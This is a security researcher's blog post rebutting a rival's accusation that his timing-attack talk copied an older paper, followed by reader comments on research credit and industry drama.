Paid Advertising
web application security lab

RSnake Puts Up

I just can’t seem to avoid controversy lately. This time Billy Hoffman decided to take a stab at something I am still befuddled by. He claimed Jeremiah Grossman and I re-presented a paper from 7 years ago. Wow, I think someone must have missed our talk and/or failed to read the paper completely. We only mentioned timing attacks in passing and in totally different contexts. Further, I’ve never once claimed to come up with the concept of timing attacks. In fact, quite the opposite. If he had read my blog carefully he would have seen that I fully admitted I had first read about the concept of it in Hacking Web Applications Exposed 2. Then in Billy’s best showdown lingo I am given the ultimatum to put up or shut up. Eesh.

I’m really not even sure what Billy thinks we stole, because the one thing we talked about in regards to timing attacks was about measuring JavaScript error time to port scan intranets, which is a concept that is not once mentioned in the paper he cites. The paper is a really good one on other practical uses for timing attacks, however, it neither mentions intranets, nor does it mention port scanning. Not really the same application but similar techniques - you will get no disagreements from me there. I guess I could see why Billy could be confused. As a side note, as maluc pointed out this paper is where the concept of timing attacks originated and is far older than the paper Billy cites. Neither of which have much to do with our talk, but there you have it.

The only other thing I can think of that would confuse Billy is that we talk about our attacks as working with and without JavaScript. The paper Billy cites does mention a JavaScript-less version of an attack, but he was talking about using it to detect if you have been somewhere or not. Jeremiah and I have totally different (and far more accurate) ways to do that, which is actually what we discussed - we didn’t even touch on using timing attacks for that purpose because it’s so much less effective than the ways we have come up with over the last year and a half. Anyway, we didn’t claim to invent JavaScript-less attacks either. I know, I know, it’s crazy to think we came up with and built everything we said we did.

So just to cover my basis in the off chance someone can figure out a way I have trampled all over the intellectual rights of any of the aforementioned papers, I hereby cite Paul Kocher and Edward Felton for the concept of timing attacks, and Al Gore and ARPAnet for the concept of the Internet and every other concept my attacks have been based on over the years. Rest assured, unlike some people in this industry I never steal research, and if I do so inadvertantly, I own up to it and publically retract. I’ve done so dozens of times on my blog whenever I find out I am in error, whether I find my error on my own or when it is communicated to me, and that’s not about to change. And if I know that I am getting awfully close to copying someone else’s work, I always find a way to make it clear that that is what I’m doing. For the record I have no problem with SPI Dynamics - as I’ve been meeting more and more of them I’m getting to know and like them, Caleb, Michael and Jeff are all great guys. Even though we’ve had our bumps in regards to who originally came up with JS port scanning, which I am well beyond done arguing about, I actually like some of the stuff coming out of that camp. Anyway, this post probably isn’t interesting to anyone - unless you just happen to be trying to publically disparage our work… or something.

11 Responses to “RSnake Puts Up”

  1. dblw1de Says:

    Billy continues to prove to me that he is simply a child trying to impress daddy in a man’s world.

    SPI/HP would do well to re-think whom they allow to use their good name and how said people behave.

  2. Mordecai P. Merriweather Says:

    Oh snap! RSnake busted out the Al Gore. Now Billy Hoffman’s criticisms are totally trivialized. You can’t step to the R to the Snake, Felton!

    How’s is the Jeremiah Grossman Coattail Ride, by the way? I hear it’s better than Magic Mountain.

  3. Michael Says:

    My friends and I were using “race conditions” and symlinks to exploit sendmail and escalate to root on 4.2 BSD systems — that would have been mid-eighties for you young fellers. I’m pretty sure we didn’t invent timing attacks either, because I am sure somebody described something similar against CMS/CP in the “Adolescence of P/1.”

    Remember Microsoft invented multi-tasking when they shipped NT.

    I wouldn’t worry about it, anyone who can coin the phrase “Premature AJAX-ulation” won’t hold a grudge for long.

  4. your mom Says:

    Yeah, every knows Billy Hoffman can be a jerk. I suppose he’s just bitter.

  5. RSnake Says:

    @dblw1de - I’m definitely not out to get anyone fired. But perhaps some PR training is in order.

    @Mordecai - cute! I’ve always liked roller coasters. Interesting non-technical come-back btw. You sure pwned me, or something.

    @Michael - they had computers in the 80’s? ;)

  6. Ronald van den Heetkamp Says:

    I’ve seen that site before ranting about nothing, Not sure what is going on lately but it takes all the fun out of it.

    In the end, what does it matter who came up with it, timing attacks exist since computers exists. So who invented it? I don’t know and hardly care actually. Okay it’s even legit as saying: hey I was the first person who triggered a buffer overflow. So what, this territorial behaviour really detroys the scene and the fun. :(

  7. rdivilbiss Says:

    There’s a bit of a difference between expanding a topic to include new information and appearing to be lifting text wholesale from another person’s presentation. Sounds like a youngster vying for some credibility to me. Not saying he can’t come up with interesting ideas on his own, but this seems awfully petty.

  8. Robert A. Says:

    I always joke with Jeremiah that the appsec space is full of so much drama.

    And so it continues! :)

    - Robert A.

  9. alt.sysrec Says:

    Petty stuff. Unfortunate you have to waste time responding to issues like this. As others have mentioned, there is a LOT of good work being done by everyone in the scene. You, JG, pdp, Ronald, whiteacid and even occasionally billy continue to produce, and more importantly share cool xss/js stuff.

    I expect this to come up more frequently as this area or research gets increased visibility. I don’t know billy, but I would not put it past HP lawyers to encourage him to protect any of their potential intellectual property so they can flush it down the toilet like they have done with acquisitions (and IP) over the past decade or two.

    Thanks for your all work RSnake.

  10. Arian Says:

    Well now….

    I’ve written about and tested for timing-based attacks on the web for years, completely different to Jer’s, Rsnake’s, and Felton’s. Most recently was some notes on this in the HEWA 2nd Edition book, which Rsnake blogged about. (thanks man, btw//!)

    I’ve never read Felton’s papers. I got the *original* ideas I experimented with from something David Litchfield told me he was doing in a completely different direction /years/ ago. And I do not hesitate to tell anyone who asks that I credit David Litchfield for stimulating my thoughts in this direction.

    Later someone blasted me for copying and failing to credit work done IN THE 1970’s on timing-based attacks against UNIX systems. Yikes! I don’t even /remember/ what web apps /looked like/ back in the 70’s.

    Anyway, this is smacks of ridiculous posturing and feels like the wrath of a woman scorned. Some soothing words might assuage the anguish of any fragile egos involved. :)

  11. Mike Says:

    I am in agreement with the fact that the territorial stuff takes all the fun out of it and it is pointless. I see this in other activities as well. I left a martial arts school because of it. It sucks when Ego’s get in the way.
    Who cares, can’t we all just discuss, create, debate have fun and learn?